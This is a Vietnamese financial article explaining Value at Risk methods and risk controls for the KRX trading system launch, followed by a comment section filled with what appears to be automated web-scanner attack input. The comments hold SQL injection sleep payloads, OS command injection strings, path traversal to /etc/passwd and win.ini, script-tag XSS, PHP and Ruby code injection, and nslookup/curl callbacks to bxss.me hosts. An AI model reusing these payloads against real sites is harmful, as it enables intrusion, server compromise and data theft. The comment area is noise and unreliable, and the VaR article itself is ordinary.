- Trang chủ
-
/ Value at Risk: “Lá chắn” không thể thiếu khi thị trường Việt Nam bước vào kỷ nguyên KRX
Value at Risk: “Lá chắn” không thể thiếu khi thị trường Việt Nam bước vào kỷ nguyên KRX
03/05/2025
2,271 lượt đọc
1. Vì sao quản trị rủi ro đột nhiên “nóng” hơn bao giờ hết?
Từ 05 / 05 / 2025, Sở Giao dịch Chứng khoán TP HCM chính thức đưa hệ thống công nghệ KRX vào vận hành. Cùng lúc, hàng loạt cơ chế mới như giao dịch T+0, bán khống, trung tâm bù trừ đối tác trung tâm (CCP) và rút ngắn quy trình thanh toán sẽ được áp dụng. Giới chuyên môn coi đây là “bước ngoặt” quan trọng giúp Việt Nam tiến gần hơn tới mục tiêu nâng hạng thị trường mới nổi.
Nhưng mọi tiện ích đều có mặt trái: tốc độ khớp lệnh nhanh hơn đồng nghĩa rủi ro thua lỗ cũng xảy ra nhanh hơn. Đòn bẩy cao (margin + bán khống) phóng đại biến động. Khi CCP tái tính ký quỹ trong ngày, chỉ cần một cú giảm giá đột ngột, nhà đầu tư thiếu kỷ luật rất dễ rơi vào “vòng xoáy margin call”.
2. VaR – Khái niệm tưởng học thuật nhưng cực thực dụng
Value at Risk (VaR) trả lời câu hỏi: “Trong khung thời gian X với mức tin cậy Y %, danh mục có thể lỗ tối đa bao nhiêu?” Thay vì cảm tính “khoảng vài phần trăm NAV”, VaR đưa ra một con số cụ thể gắn cùng mức xác suất, giúp mọi bộ phận – giao dịch, quản trị rủi ro, lãnh đạo – cùng nói chung một ngôn ngữ.
- VaR 1 ngày, 99 % của danh mục 100 tỷ đồng bằng 3 tỷ đồng nghĩa là: 99 % khả năng ngày mai danh mục sẽ không bốc hơi quá 3 tỷ.
- Nhưng 1 % hi hữu vẫn có thể xảy ra; muốn biết “lỡ vượt VaR thì lỗ tới đâu”, ta dùng thêm Expected Shortfall (ES).
3. Ba cách ước tính VaR: ưu – nhược và ứng dụng thực tế
| Phương pháp | Khi nào nên dùng | Điểm mạnh | Điểm cần lưu ý |
| Historical Simulation | Danh mục blue‑chip, dữ liệu lịch sử dày | Ít giả định, bám sát giá quá khứ | Thị trường đổi “regime” dễ đánh giá thiếu tail‑risk |
| Variance–Covariance (Parametric) | Cần kết quả nhanh (Excel), danh mục ổn định | Tính gọn nhẹ; tiện kết hợp ma trận hiệp phương sai | Giả định lợi suất “đẹp”; đuôi phân phối béo sẽ làm VaR thiếu thận trọng |
| Monte Carlo Simulation | Danh mục đòn bẩy, phái sinh, beta cao | Linh hoạt, mô phỏng nhiều kịch bản chưa từng xuất hiện | Đòi hỏi dữ liệu, mô hình xác suất và công suất tính toán |
Lưu ý riêng với KRX: sự xuất hiện của T+0, bán khống sẽ làm lợi suất ngày “béo đuôi” hơn; nhà đầu tư nắm phái sinh hoặc cổ phiếu biến động mạnh nên ưu tiên Monte Carlo hoặc ít nhất là Historical Simulation kết hợp kiểm tra tail‑risk.
4. Xây dựng hệ sinh thái VaR “sống” trong môi trường KRX
- Dữ liệu và hạ tầng
- Thu thập tối thiểu 250 phiên (≈ 1 năm) cho tính VaR ngày; thêm dữ liệu phút hoặc tick để tính VaR nội phiên.
- Chuẩn hóa dữ liệu: loại bỏ giao dịch thỏa thuận lớn bất thường, chỉnh giá sau quyền.
- Quy trình cảnh báo tự động
- Thiết lập ngưỡng VaR = 5 % NAV đối với danh mục cổ phiếu; 3 % NAV nếu dùng margin trên 100 %.
- Hệ thống cảnh báo khi VaR tiệm cận 80 % ngưỡng; vượt ngưỡng sẽ khóa lệnh mua, yêu cầu hạ đòn bẩy hoặc mở hedge VN30F.
- Stress Test hằng tuần
- Áp dụng kịch bản “thị trường giảm 7 % trong 30 phút” (tương đương một phiên bán tháo cuối 2022) để đo VaR + ES.
- Giả lập tình huống thanh khoản cạn: giảm 30 % khối lượng khớp, cộng trượt giá 0,5 % mỗi giao dịch, xem danh mục có vượt “vùng đỏ” không.
- Ba tuyến phòng thủ
- Front Office: trader bắt buộc kiểm tra VaR trước khi đặt lệnh lớn.
- Middle Office: đo VaR/ES mỗi 15 phút cho tài khoản đòn bẩy cao.
- Back Office: theo dõi hệ số an toàn ký quỹ CCP, bảo đảm tiền nộp bổ sung sẵn sàng nếu VaR bật tăng bất thường.
5. Tình huống điển hình: danh mục 10 tỷ đồng, 5 mã VN30
Trước khi KRX chạy: VaR 1 ngày 99 % ~150 triệu (1,5 % NAV).
Ba tuần thử nghiệm mô phỏng T+0 & short selling: biên độ lợi suất ngày tăng 25 %, tương quan nội phiên thắt chặt → VaR vọt lên 190 triệu (1,9 % NAV).
Chủ tài khoản đặt “ngưỡng đau tim” 170 triệu. Có hai khả năng:
- Giảm margin: hạ vay xuống 50 % → VaR giảm còn ~155 triệu, danh mục an toàn.
- Giữ margin nhưng mở vị thế bán VN30F tương đương 20 % NAV → lợi suất danh mục và VN30F âm thuận chiều, VaR giảm ~18 %.
Nhờ VaR “phát hiện sớm”, tài khoản tránh bị call ký quỹ trong ngày KRX go‑live khi thị trường rung mạnh phiên sáng.
6. Các “bẫy” VaR thường gặp trên thị trường Việt Nam
- Dữ liệu thiếu khủng hoảng: chuỗi giá 2023–2024 khá êm so với cú sốc 2020; lấy dữ liệu quá ngắn dễ “ru ngủ” VaR.
- Thanh khoản đảo chiều nhanh: trong phiên hoảng loạn, phí trượt giá tăng và lệnh bán lớn khớp chậm. VaR không tự động tính phí đó nếu người dùng không cộng thêm “haircut” thanh khoản.
- “Đê bê tông” tâm lý: VaR chỉ là con số; kỷ luật cắt lỗ, giảm margin mới quyết định sống còn.
7. Lộ trình gợi ý cho ba nhóm nhà đầu tư
| Nhóm | Việc cần làm ngay | Mốc 3 tháng | Mốc 6–12 tháng |
| Cá nhân dùng margin | Cài đặt bảng tính VaR/ES cuối ngày | Theo dõi VaR nội phiên trên app CK | Liên kết app với API dữ liệu phút để tự động giảm vị thế khi VaR vượt ngưỡng |
| Công ty chứng khoán tự doanh | Gom dữ liệu tick, kịch bản stress | Tự động tính VaR/ES 15 phút, cảnh báo phòng giao dịch | Kết hợp VaR với mô hình phân bổ vốn Risk‑Adjusted Return, báo cáo SSC |
| Quỹ mở/quỹ hưu trí | Thiết lập limit VaR theo điều lệ quỹ | Back‑test VaR các giai đoạn 2018, 2020, 2022 | Xây dựng dashboard VaR + ES + đo độ nhạy thanh khoản, báo cáo nhà đầu tư định kỳ |
8. Thay lời kết
KRX mở ra một sân chơi nhanh, sâu, rộng hơn – đồng thời đặt ra thử thách lớn về kỷ luật quản trị rủi ro. VaR, nếu được tính đúng cách, nuôi bằng dữ liệu sạch và gắn với cơ chế hành động rõ ràng, sẽ trở thành “lá chắn” cần thiết.
Đừng coi VaR là phép toán chết; hãy biến nó thành hệ thống cảnh báo sống: báo hiệu, phản hồi, thích ứng. Khi đó, dù thị trường có đổi mới đến đâu, tài khoản của bạn vẫn ở thế chủ động – và lợi nhuận bền vững sẽ là phần thưởng xứng đáng cho sự chuyên nghiệp
Hãy xây dựng và kiểm thử chiến lược giao dịch phái sinh của bạn trên nền tảng QMTRADE trước khi sử dụng tiền thật để tránh những rủi ro không đáng có.
Đánh giá
181,207 / 5
ubaTaeCJ
'"()
555
ubaTaeCJ
@
555
ubaTaeCJ
tes****@example.com
555
ubaTaeCJ
tes****@example.com
555
ubaTaeCJ
tes****@example.com
555 bcc:[email protected]
ubaTaeCJ
tes****@example.com
ubaTaeCJ
tes****@example.com
555
ubaTaeCJ
tes****@example.com bcc:0.4117-6624.4117.7467d.20326.2
555
ubaTaeCJ
[email protected]> bcc:0.4117-6625.4117.7467d.20326.2
555
ubaTaeCJ bcc:[email protected]
tes****@example.com
555
ubaTaeCJ
tes****@example.com
../../../../../../../../../../../../../../etc/passwd
[email protected]> bcc:[email protected]
tes****@example.com
555
ubaTaeCJ
tes****@example.com
ubaTaeCJ
tes****@example.com
../../../../../../../../../../../../../../windows/win.ini
ubaTaeCJ
tes****@example.com
555
ubaTaeCJ
tes****@example.com
12345'"\'\");|]*
ubaTaeCJ
tes****@example.com
file:///etc/passwd
ubaTaeCJ
tes****@example.com
555
ubaTaeCJ
tes****@example.com
555
ubaTaeCJ
tes****@example.com
../555
ubaTaeCJ
tes****@example.com
555<esi:include src="http://bxss.me/rpb.png"/>
ubaTaeCJ
../../../../../../../../../../../../../../etc/passwd
555
ubaTaeCJ
12345'"\'\");|]*
555
ubaTaeCJ
tes****@example.com<esi:include src="http://bxss.me/rpb.png"/>
555
ubaTaeCJ
../../../../../../../../../../../../../../windows/win.ini
555
ubaTaeCJ<esi:include src="http://bxss.me/rpb.png"/>
tes****@example.com
555
ubaTaeCJ
file:///etc/passwd
555
ubaTaeCJ
tes****@example.com
555
ubaTaeCJ
tes****@example.com
555
ubaTaeCJ
tes****@example.com
${9999990+10000101}
ubaTaeCJ
tes****@example.com
echo ptkyoo$()\ mieiou\nz^xyu||a #' &echo ptkyoo$()\ mieiou\nz^xyu||a #|" &echo ptkyoo$()\ mieiou\nz^xyu||a #
ubaTaeCJ
../*******@example.com
555
ubaTaeCJ
${10000334+9999779}
555
12345'"\'\");|]*
tes****@example.com
555
ubaTaeCJ
tes****@example.com
&echo aclnmu$()\ smnbhw\nz^xyu||a #' &echo aclnmu$()\ smnbhw\nz^xyu||a #|" &echo aclnmu$()\ smnbhw\nz^xyu||a #
../../../../../../../../../../../../../../etc/passwd
tes****@example.com
555
${9999076+10000378}
tes****@example.com
555
response.write(9215170*9814959)
tes****@example.com
555
ubaTaeCJ
tes****@example.com
555&echo futiyo$()\ wspyuc\nz^xyu||a #' &echo futiyo$()\ wspyuc\nz^xyu||a #|" &echo futiyo$()\ wspyuc\nz^xyu||a #
../../../../../../../../../../../../../../windows/win.ini
tes****@example.com
555
ubaTaeCJ
tes****@example.com
555
ubaTaeCJ
tes****@example.com
|echo eqmqnj$()\ nlrbjl\nz^xyu||a #' |echo eqmqnj$()\ nlrbjl\nz^xyu||a #|" |echo eqmqnj$()\ nlrbjl\nz^xyu||a #
file:///etc/passwd
tes****@example.com
555
ubaTaeCJ
tes****@example.com
555
ubaTaeCJ
tes****@example.com
555|echo mjarhw$()\ kbpwwo\nz^xyu||a #' |echo mjarhw$()\ kbpwwo\nz^xyu||a #|" |echo mjarhw$()\ kbpwwo\nz^xyu||a #
ubaTaeCJ
tes****@example.com
555
NUZOdUtxVjM=
tes****@example.com
555
ubaTaeCJ
tes****@example.com
555
ubaTaeCJ
tes****@example.com
(nslookup -q=cname hitxgyzjknrbff74f1.bxss.me||curl hitxgyzjknrbff74f1.bxss.me))
../ubaTaeCJ
tes****@example.com
555
ubaTaeCJ
tes****@example.com
555
ubaTaeCJ
tes****@example.com
$(nslookup -q=cname hitgnczxxzymha2858.bxss.me||curl hitgnczxxzymha2858.bxss.me)
ubaTaeCJ
tes****@example.com
555
ubaTaeCJ
tes****@example.com
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
ubaTaeCJ
tes****@example.com
&nslookup -q=cname hitgfrpqdbilxeb57e.bxss.me&'\"`0&nslookup -q=cname hitgfrpqdbilxeb57e.bxss.me&`'
ubaTaeCJ
tes****@example.com
555
ubaTaeCJ
tes****@example.com
555
ubaTaeCJ
tes****@example.com
'"
ubaTaeCJ
tes****@example.com
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs
ubaTaeCJ
tes****@example.com
&(nslookup -q=cname hituvhkyavdci89de2.bxss.me||curl hituvhkyavdci89de2.bxss.me)&'\"`0&(nslookup -q=cname hituvhkyavdci89de2.bxss.me||curl hituvhkyavdci89de2.bxss.me)&`'
ubaTaeCJ
tes****@example.com
)
ubaTaeCJ
tes****@example.com
response.write(9511822*9789002)
ubaTaeCJ
tes****@example.com
555
ubaTaeCJ
tes****@example.com
<!--
ubaTaeCJ
tes****@example.com
Http://bxss.me/t/fit.txt
ubaTaeCJ
tes****@example.com
|(nslookup -q=cname hitzqvbzdhyxqdf841.bxss.me||curl hitzqvbzdhyxqdf841.bxss.me)
ubaTaeCJ
tes****@example.com
!(()&&!|*|*|
ubaTaeCJ
tes****@example.com
'+response.write(9511822*9789002)+'
ubaTaeCJ
tes****@example.com
555
ubaTaeCJ
'"
555
ubaTaeCJ
tes****@example.com
http://bxss.me/t/fit.txt?.jpg
ubaTaeCJ
tes****@example.com
`(nslookup -q=cname hitptgoixcmkdb335a.bxss.me||curl hitptgoixcmkdb335a.bxss.me)`
ubaTaeCJ
tes****@example.com
^(#$!@#$)(()))******
ubaTaeCJ
tes****@example.com
"+response.write(9511822*9789002)+"
ubaTaeCJ
tes****@example.com
555
ubaTaeCJ
<!--
555
ubaTaeCJ
tes****@example.com
/etc/shells
ubaTaeCJ
tes****@example.com
;(nslookup -q=cname hitgxsjbmgvwz85cda.bxss.me||curl hitgxsjbmgvwz85cda.bxss.me)|(nslookup -q=cname hitgxsjbmgvwz85cda.bxss.me||curl hitgxsjbmgvwz85cda.bxss.me)&(nslookup -q=cname hitgxsjbmgvwz85cda.bxss.me||curl hitgxsjbmgvwz85cda.bxss.me)
ubaTaeCJ
)
555
ubaTaeCJ
response.write(9363672*9618060)
555
'"
tes****@example.com
555
ubaTaeCJ
tes****@example.com
c:/windows/win.ini
ubaTaeCJ
echo nydskr$()\ xnolcq\nz^xyu||a #' &echo nydskr$()\ xnolcq\nz^xyu||a #|" &echo nydskr$()\ xnolcq\nz^xyu||a #
555
ubaTaeCJ
!(()&&!|*|*|
555
ubaTaeCJ
'+response.write(9363672*9618060)+'
555
<!--
tes****@example.com
555
ubaTaeCJ
tes****@example.com
bxss.me
ubaTaeCJ
&echo qaevrk$()\ cxacdu\nz^xyu||a #' &echo qaevrk$()\ cxacdu\nz^xyu||a #|" &echo qaevrk$()\ cxacdu\nz^xyu||a #
555
ubaTaeCJ
^(#**@#$)(()))******
555
ubaTaeCJ
"+response.write(9363672*9618060)+"
555
ubaTaeCJ
tes****@example.com
555
ubaTaeCJ
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.com
555
ubaTaeCJ
tes****@example.com&echo fyfadt$()\ hsdukp\nz^xyu||a #' &echo fyfadt$()\ hsdukp\nz^xyu||a #|" &echo fyfadt$()\ hsdukp\nz^xyu||a #
555
)
tes****@example.com
555
ubaTaeCJ
tes****@example.com
555
ubaTaeCJ
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs
555
ubaTaeCJ
|echo zggwpb$()\ ddqdoq\nz^xyu||a #' |echo zggwpb$()\ ddqdoq\nz^xyu||a #|" |echo zggwpb$()\ ddqdoq\nz^xyu||a #
555
ubaTaeCJ
tes****@example.com
HttP://bxss.me/t/xss.html?%00
!(()&&!|*|*|
tes****@example.com
555
'+response.write(9215170*9814959)+'
tes****@example.com
555
ubaTaeCJ
Http://bxss.me/t/fit.txt
555
ubaTaeCJ
tes****@example.com|echo igdvok$()\ klquza\nz^xyu||a #' |echo igdvok$()\ klquza\nz^xyu||a #|" |echo igdvok$()\ klquza\nz^xyu||a #
555
ubaTaeCJ
tes****@example.com
bxss.me/t/xss.html?%00
^(#$!@#$)(()))******
tes****@example.com
555
"+response.write(9215170*9814959)+"
tes****@example.com
555
ubaTaeCJ
http://bxss.me/t/fit.txt?.com
555
ubaTaeCJ
(nslookup -q=cname hithoaljbaova4b581.bxss.me||curl hithoaljbaova4b581.bxss.me))
555
ubaTaeCJ
HttP://bxss.me/t/xss.html?%00
555
ubaTaeCJ
tes****@example.com
"+"A".concat(70-3).concat(22*4).concat(115).concat(79).concat(109).concat(71)+(require"socket" Socket.gethostbyname("hitot"+"aldqgbelddd05.bxss.me.")[3].to_s)+"
ubaTaeCJ
tes****@example.com
555
ubaTaeCJ
tes****@example.com
555
ubaTaeCJ
/etc/shells
555
ubaTaeCJ
$(nslookup -q=cname hittkugnyzdkgdaa16.bxss.me||curl hittkugnyzdkgdaa16.bxss.me)
555
ubaTaeCJ
bxss.me/t/xss.html?%00
555
ubaTaeCJ
tes****@example.com
'+'A'.concat(70-3).concat(22*4).concat(114).concat(77).concat(120).concat(74)+(require'socket' Socket.gethostbyname('hithm'+'ptntwali40ac7.bxss.me.')[3].to_s)+'
ubaTaeCJ
tes****@example.com
555
ubaTaeCJ
tes****@example.com
555
ubaTaeCJ
tes****@example.com
review-store
ubaTaeCJ
c:/windows/win.ini
555
ubaTaeCJ
&nslookup -q=cname hitrpukfaavmmd654a.bxss.me&'\"`0&nslookup -q=cname hitrpukfaavmmd654a.bxss.me&`'
555
HttP://bxss.me/t/xss.html?%00
tes****@example.com
555
ubaTaeCJ
"+"A".concat(70-3).concat(22*4).concat(115).concat(87).concat(122).concat(82)+(require"socket" Socket.gethostbyname("hitsf"+"nqitjdcl55659.bxss.me.")[3].to_s)+"
555
ubaTaeCJ
tes****@example.com
555
ubaTaeCJ
tes****@example.com
555
ubaTaeCJ
tes****@example.com
review-store
ubaTaeCJ
bxss.me
555
ubaTaeCJ
&(nslookup -q=cname hitzuefuyujfhcb7fb.bxss.me||curl hitzuefuyujfhcb7fb.bxss.me)&'\"`0&(nslookup -q=cname hitzuefuyujfhcb7fb.bxss.me||curl hitzuefuyujfhcb7fb.bxss.me)&`'
555
bxss.me/t/xss.html?%00
tes****@example.com
555
ubaTaeCJ
'+'A'.concat(70-3).concat(22*4).concat(102).concat(83).concat(101).concat(87)+(require'socket' Socket.gethostbyname('hitpv'+'sntioxax94ba5.bxss.me.')[3].to_s)+'
555
ubaTaeCJ
tes****@example.com
review-store/.
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
tes****@example.com
555
ubaTaeCJ
|(nslookup -q=cname hitzwpehlaudd9c63d.bxss.me||curl hitzwpehlaudd9c63d.bxss.me)
555
ubaTaeCJ
tes****@example.com
555
"+"A".concat(70-3).concat(22*4).concat(109).concat(76).concat(121).concat(67)+(require"socket" Socket.gethostbyname("hitdo"+"ndorhnbb1487d.bxss.me.")[3].to_s)+"
tes****@example.com
555
ubaTaeCJ
tes****@example.com
xfs.bxss.me
ubaTaeCJ
review-store
555
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs
tes****@example.com
555
ubaTaeCJ
`(nslookup -q=cname hituiytpylowm1cfe6.bxss.me||curl hituiytpylowm1cfe6.bxss.me)`
555
ubaTaeCJ
tes****@example.com
555
'+'A'.concat(70-3).concat(22*4).concat(116).concat(73).concat(97).concat(87)+(require'socket' Socket.gethostbyname('hitfj'+'uhfrwgvu54c5d.bxss.me.')[3].to_s)+'
tes****@example.com
555
ubaTaeCJ
xfs.bxss.me
555
ubaTaeCJ
review-store
555
Http://bxss.me/t/fit.txt
tes****@example.com
555
ubaTaeCJ
;(nslookup -q=cname hitckefjqfkkh98277.bxss.me||curl hitckefjqfkkh98277.bxss.me)|(nslookup -q=cname hitckefjqfkkh98277.bxss.me||curl hitckefjqfkkh98277.bxss.me)&(nslookup -q=cname hitckefjqfkkh98277.bxss.me||curl hitckefjqfkkh98277.bxss.me)
555
ubaTaeCJ
tes****@example.com
555
xfs.bxss.me
tes****@example.com
555
ubaTaeCJ
tes****@example.com
555
ubaTaeCJ
tes****@example.com
555'"()&%<zzz><ScRiPt >xNze(9140)</ScRiPt>
ubaTaeCJ
review-store/.
555
http://bxss.me/t/fit.txt?.jpg
tes****@example.com
555
echo repfag$()\ kcpjbq\nz^xyu||a #' &echo repfag$()\ kcpjbq\nz^xyu||a #|" &echo repfag$()\ kcpjbq\nz^xyu||a #
tes****@example.com
555
ubaTaeCJ
tes****@example.com
555
ubaTaeCJ
tes****@example.com
555
ubaTaeCJ
tes****@example.com
555
review-store
tes****@example.com
555
/etc/shells
tes****@example.com
555
&echo dbhwpf$()\ ypaeaa\nz^xyu||a #' &echo dbhwpf$()\ ypaeaa\nz^xyu||a #|" &echo dbhwpf$()\ ypaeaa\nz^xyu||a #
tes****@example.com
555
ubaTaeCJ
tes****@example.com
'"()&%<zzz><ScRiPt >xNze(9320)</ScRiPt>
review-store
tes****@example.com
555
c:/windows/win.ini
tes****@example.com
555
ubaTaeCJ&echo gmnufd$()\ qlonta\nz^xyu||a #' &echo gmnufd$()\ qlonta\nz^xyu||a #|" &echo gmnufd$()\ qlonta\nz^xyu||a #
tes****@example.com
555
review-store/.
tes****@example.com
555
ubaTaeCJ
tes****@example.com
5559545214
bxss.me
tes****@example.com
555
|echo nusbbp$()\ kmywnr\nz^xyu||a #' |echo nusbbp$()\ kmywnr\nz^xyu||a #|" |echo nusbbp$()\ kmywnr\nz^xyu||a #
tes****@example.com
555
ubaTaeCJ
tes****@example.com
'.gethostbyname(lc('hitmz'.'hhjvmgryec7a4.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(121).chr(78).chr(117).chr(79).'
ubaTaeCJ
tes****@example.com
555
ubaTaeCJ
tes****@example.com
555
ubaTaeCJ|echo pogdyc$()\ umfyvd\nz^xyu||a #' |echo pogdyc$()\ umfyvd\nz^xyu||a #|" |echo pogdyc$()\ umfyvd\nz^xyu||a #
tes****@example.com
555
ubaTaeCJ
tes****@example.com'"()&%<zzz><ScRiPt >xNze(9238)</ScRiPt>
555
ubaTaeCJ
tes****@example.com
".gethostbyname(lc("hitoz"."hothvuujba30f.bxss.me."))."A".chr(67).chr(hex("58")).chr(108).chr(75).chr(113).chr(74)."
ubaTaeCJ
tes****@example.com
555
ubaTaeCJ
tes****@example.com
555
(nslookup -q=cname hitlvaxxnbxao967f6.bxss.me||curl hitlvaxxnbxao967f6.bxss.me))
tes****@example.com
555
ubaTaeCJ
'.gethostbyname(lc('hitma'.'abzootue1cc57.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(109).chr(85).chr(112).chr(81).'
555
ubaTaeCJ
tes****@example.com
555
ubaTaeCJ
tes****@example.com
555
ubaTaeCJ
'"()&%<zzz><ScRiPt >xNze(9568)</ScRiPt>
555
$(nslookup -q=cname hitozasqimwte9d198.bxss.me||curl hitozasqimwte9d198.bxss.me)
tes****@example.com
555
ubaTaeCJ
".gethostbyname(lc("hitsy"."tixmaohm97273.bxss.me."))."A".chr(67).chr(hex("58")).chr(120).chr(73).chr(105).chr(78)."
555
ubaTaeCJ
tes****@example.com
555
&nslookup -q=cname hitnscrvugqfo64516.bxss.me&'\"`0&nslookup -q=cname hitnscrvugqfo64516.bxss.me&`'
tes****@example.com
555
ubaTaeCJ
tes****@example.com
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
ubaTaeCJ
tes****@example.com9226221
555
'.gethostbyname(lc('hitzh'.'pgqnbzvh1f3be.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(99).chr(89).chr(120).chr(87).'
tes****@example.com
555
ubaTaeCJ
tes****@example.com
555
&(nslookup -q=cname hitckshgsarqha7441.bxss.me||curl hitckshgsarqha7441.bxss.me)&'\"`0&(nslookup -q=cname hitckshgsarqha7441.bxss.me||curl hitckshgsarqha7441.bxss.me)&`'
tes****@example.com
555
ubaTaeCJ
tes****@example.com
555
ubaTaeCJ
tes****@example.com
';print(md5(31337));$a='
".gethostbyname(lc("hitwi"."qpvxexita94f7.bxss.me."))."A".chr(67).chr(hex("58")).chr(110).chr(75).chr(120).chr(71)."
tes****@example.com
555
ubaTaeCJ
tes****@example.com
555
|(nslookup -q=cname hitkyouzqdpzj1a95f.bxss.me||curl hitkyouzqdpzj1a95f.bxss.me)
tes****@example.com
555
ubaTaeCJ'"()&%<zzz><ScRiPt >xNze(9507)</ScRiPt>
tes****@example.com
555
ubaTaeCJ
tes****@example.com
";print(md5(31337));$a="
ubaTaeCJ
tes****@example.com
555
ubaTaeCJ
tes****@example.com
555
`(nslookup -q=cname hitirmsvyuxji963f1.bxss.me||curl hitirmsvyuxji963f1.bxss.me)`
tes****@example.com
555
ubaTaeCJ
tes****@example.com
'"()
ubaTaeCJ
tes****@example.com
${@print(md5(31337))}
ubaTaeCJ
tes****@example.com
555
ubaTaeCJ
tes****@example.com
555"&&sleep(27*1000)*urtith&&"
'"()&%<zzz><ScRiPt >xNze(9494)</ScRiPt>
tes****@example.com
555
;(nslookup -q=cname hitvrdmlvbaope0aaf.bxss.me||curl hitvrdmlvbaope0aaf.bxss.me)|(nslookup -q=cname hitvrdmlvbaope0aaf.bxss.me||curl hitvrdmlvbaope0aaf.bxss.me)&(nslookup -q=cname hitvrdmlvbaope0aaf.bxss.me||curl hitvrdmlvbaope0aaf.bxss.me)
tes****@example.com
555
ubaTaeCJ
tes****@example.com
555'&&sleep(27*1000)*oysiia&&'
ubaTaeCJ
tes****@example.com
${@print(md5(31337))}\
ubaTaeCJ
tes****@example.com
'.print(md5(31337)).'
ubaTaeCJ9582950
tes****@example.com
555
ubaTaeCJ
tes****@example.com
555
ubaTaeCJ
tes****@example.com
555'||sleep(27*1000)*ptsbmy||'
ubaTaeCJ
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
555
ubaTaeCJ
tes****@example.com
555
ubaTaeCJ
tes****@example.com
555"||sleep(27*1000)*tlzaur||"
ubaTaeCJ
';print(md5(31337));$a='
555
ubaTaeCJ
tes****@example.com
555
ubaTaeCJ
tes****@example.com
555
ubaTaeCJ
";print(md5(31337));$a="
555
ubaTaeCJ
tes****@example.com
555
ubaTaeCJ
tes****@example.com
555
ubaTaeCJ
tes****@example.com
555
ubaTaeCJ
${@print(md5(31337))}
555
ubaTaeCJ
tes****@example.com
555
ubaTaeCJ
${@print(md5(31337))}\
555
ubaTaeCJ
tes****@example.com
555
ubaTaeCJ
tes****@example.com
555
ubaTaeCJ
'.print(md5(31337)).'
555
ubaTaeCJ
tes****@example.com
555
ubaTaeCJ
tes****@example.com'&&sleep(27*1000)*kbvqje&&'
555
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
tes****@example.com
555
ubaTaeCJ
tes****@example.com
555
ubaTaeCJ
tes****@example.com"&&sleep(27*1000)*ckmasl&&"
555
';print(md5(31337));$a='
tes****@example.com
555
ubaTaeCJ
tes****@example.com
555
ubaTaeCJ
tes****@example.com'||sleep(27*1000)*pkxqiw||'
555
";print(md5(31337));$a="
tes****@example.com
555
ubaTaeCJ
tes****@example.com
555
ubaTaeCJ
tes****@example.com"||sleep(27*1000)*cbojrd||"
555
${@print(md5(31337))}
tes****@example.com
555
ubaTaeCJ
tes****@example.com
555
${@print(md5(31337))}\
tes****@example.com
555
ubaTaeCJ
tes****@example.com
555
'.print(md5(31337)).'
tes****@example.com
555
ubaTaeCJ
tes****@example.com
555
'"()
tes****@example.com
555
ubaTaeCJ
tes****@example.com
555
ubaTaeCJ'&&sleep(27*1000)*gvzshi&&'
tes****@example.com
555
ubaTaeCJ
tes****@example.com
555
ubaTaeCJ"&&sleep(27*1000)*fnkfzc&&"
tes****@example.com
555
ubaTaeCJ
tes****@example.com
555
ubaTaeCJ'||sleep(27*1000)*lvqtcj||'
tes****@example.com
555
ubaTaeCJ
tes****@example.com
555
ubaTaeCJ"||sleep(27*1000)*absgjf||"
tes****@example.com
555
ubaTaeCJ
tes****@example.com
555
ubaTaeCJ
tes****@example.com
555
ubaTaeCJ
tes****@example.com
555
ubaTaeCJ
tes****@example.com
555
ubaTaeCJ
tes****@example.com
555
ubaTaeCJ
tes****@example.com
555
ubaTaeCJ
tes****@example.com
555
ubaTaeCJ
tes****@example.com
555
ubaTaeCJ
tes****@example.com
555
ubaTaeCJ
tes****@example.com
555
ubaTaeCJ
tes****@example.com
555
ubaTaeCJ
tes****@example.com
555
ubaTaeCJ
tes****@example.com
555*if(now()=sysdate(),sleep(15),0)
ubaTaeCJ
tes****@example.com
5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z
ubaTaeCJ
tes****@example.com
5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z
ubaTaeCJ
tes****@example.com
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
ubaTaeCJ
tes****@example.com
555-1; waitfor delay '0:0:15' --
ubaTaeCJ
tes****@example.com
555-1); waitfor delay '0:0:15' --
ubaTaeCJ
tes****@example.com
555-1 waitfor delay '0:0:15' --
ubaTaeCJ
tes****@example.com
555CAfc9ogy'; waitfor delay '0:0:15' --
ubaTaeCJ
tes****@example.com
555-1 OR 449=(SELECT 449 FROM PG_SLEEP(15))--
ubaTaeCJ
tes****@example.com
555-1) OR 554=(SELECT 554 FROM PG_SLEEP(15))--
ubaTaeCJ
tes****@example.com
555-1)) OR 782=(SELECT 782 FROM PG_SLEEP(15))--
ubaTaeCJ
tes****@example.com
5555pzjNZIB' OR 986=(SELECT 986 FROM PG_SLEEP(15))--
ubaTaeCJ
tes****@example.com
555FUb1zWiK') OR 342=(SELECT 342 FROM PG_SLEEP(15))--
ubaTaeCJ
tes****@example.com
555M13IuE7t')) OR 643=(SELECT 643 FROM PG_SLEEP(15))--
ubaTaeCJ
tes****@example.com
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
ubaTaeCJ
tes****@example.com
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
ubaTaeCJ
tes****@example.com
555'"
ubaTaeCJ
tes****@example.com
@@drsFx
ubaTaeCJ
tes****@example.com
555
ubaTaeCJ
tes****@example.com
555
ubaTaeCJ
if(now()=sysdate(),sleep(15),0)
555
ubaTaeCJ
tes****@example.com0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
555
ubaTaeCJ
tes****@example.com0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
555
ubaTaeCJ
